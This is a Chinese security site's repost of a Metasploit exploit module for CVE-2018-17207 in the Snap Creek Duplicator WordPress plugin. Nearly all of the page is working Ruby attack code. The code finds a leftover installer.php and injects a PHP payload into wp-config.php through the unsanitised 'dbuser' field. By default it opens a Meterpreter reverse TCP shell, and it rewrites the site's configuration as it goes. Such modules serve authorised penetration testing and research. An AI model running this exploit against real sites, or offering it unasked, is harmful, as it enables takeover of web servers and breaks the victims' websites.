首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Snap Creek Duplicator Code Injection
来源:metasploit.com 作者:Legras 发布时间:2018-12-12  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking # this module overwrites the configuration file, breaking the website

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Snap Creek Duplicator WordPress plugin code injection',
      'Description'     => %q{
        When the WordPress plugin Snap Creek Duplicator restores a backup, it
        leaves dangerous files in the filesystem such as installer.php and
        installer-backup.php. These files allow anyone to call a function that
        overwrite the wp-config.php file AND this function does not sanitize
        POST parameters before inserting them inside the wp-config.php file,
        leading to arbitrary PHP code execution.
        WARNING: This exploit WILL break the wp-config.php file. If possible try
        to restore backups of the configuration after the exploit to make the
        WordPress site work again.
      },
      'Author'          => [
        'Julien Legras <julien.legras@synacktiv.com>',
        'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>'
      ],
      'References'     => [
        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
        ['WPVDB', '9123'],
        ['CVE', '2018-17207']
      ],
      'License'         => MSF_LICENSE,
      'Privileged'      => false,
      'DisclosureDate'  => 'Aug 29 2018',
      'DefaultOptions'  =>
      {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
      'DefaultTarget'   => 0))

    register_options([
      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
      OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
      ])
  end

  def check
    tpath = normalize_uri(datastore['TARGETURI'])

    vprint_status("Checking URI #{rhost+tpath}")
    response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])

    unless response
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless response.code == 200
      vprint_error("Server responded with #{response.code}")
      return CheckCode::Safe
    end

    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
    if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
      return CheckCode::Vulnerable
    else
      return CheckCode::Detected
    end

  end

  def create_wp_config_file
    # 1. GET the installer.php to retrieve the archive name.
    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
    unless response && response.code == 200
      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
    end
    archive_name = response.body.to_s.scan(/value="([^"]*.zip)"/).flatten.first
    if archive_name.blank?
      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
    end

    print_status("Found archive name #{archive_name}")

    # 2. Perform the 1st step to actually create the wp-config.php file.
    response = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(datastore['TARGETURI']),
      'vars_post'   => {
        'action_ajax' => "1",
        'action_step' => "1",
        'archive_name' => archive_name,
        'archive_engine' => "ziparchive",
        'exe_safe_mode' => "0",
        'archive_filetime' => "current",
        'logging' => "1"
      }
    }, timeout=datastore['TIMEOUT'])
    unless response && response.code == 200
      fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
    end

    print_status("Successfully created the wp-config.php file!")
  end

  def exploit
    print_status("Checking if the wp-config.php file already exists...")
    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
    response = send_request_cgi({ 'uri' => tpath_wp_config}, timeout=datastore['TIMEOUT'])

    if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
      print_status("This WordPress was not restored. Creating the wp-config.php file...")
      create_wp_config_file
    end

    # 2. Exploit the code injection.
    print_status("All good! Injecting PHP code in the wp-config.php file...")
    response = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(datastore['TARGETURI']),
      'vars_post'   => {
        'action_ajax' => "3",
        'action_step' => "3",
        'dbhost' => rand_text_alphanumeric(20),
        'dbname' => rand_text_alphanumeric(20),
        'dbpass' => rand_text_alphanumeric(20),
        'dbuser' => "');?>" + payload.encoded + "/*",
        'dbport' => rand_text_numeric(5)
      }
    }, timeout=datastore['TIMEOUT'])

    if response && response.code == 200
      print_status("Requesting wp-config.php to execute the payload...")
      send_request_cgi({ 'uri' => tpath_wp_config }, timeout=datastore['TIMEOUT'])
    else
      print_error("Failed to inject PHP code in wp-config.php...")
    end
  end

  def on_new_session(client)
    if client.type.eql?('meterpreter')
      client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
      client.fs.file.rm('wp-config.php')
    else
      client.shell_command_token('rm wp-config.php')
    end
    print_status("Attempting to recreate wp-config file...")
    create_wp_config_file
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·PrestaShop 1.6.x / 1.7.x Remot
·WebDAV Server Serving DLL
·SmartFTP Client 9.0.2623.0 Den
·LanSpy 2.0.1.159 Buffer Overfl
·Windows UAC Protection Bypass
·Linux userfaultfd tmpfs File P
·Safari Proxy Object Type Confu
·WebKit JIT Proxy Object Issue
·UltraISO 9.7.1.3519 Output Fil
·CyberLink LabelPrint 2.5 Stack
·Cisco RV110W Password Disclosu
·Google Chrome 70.0.3538.77 Cro
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved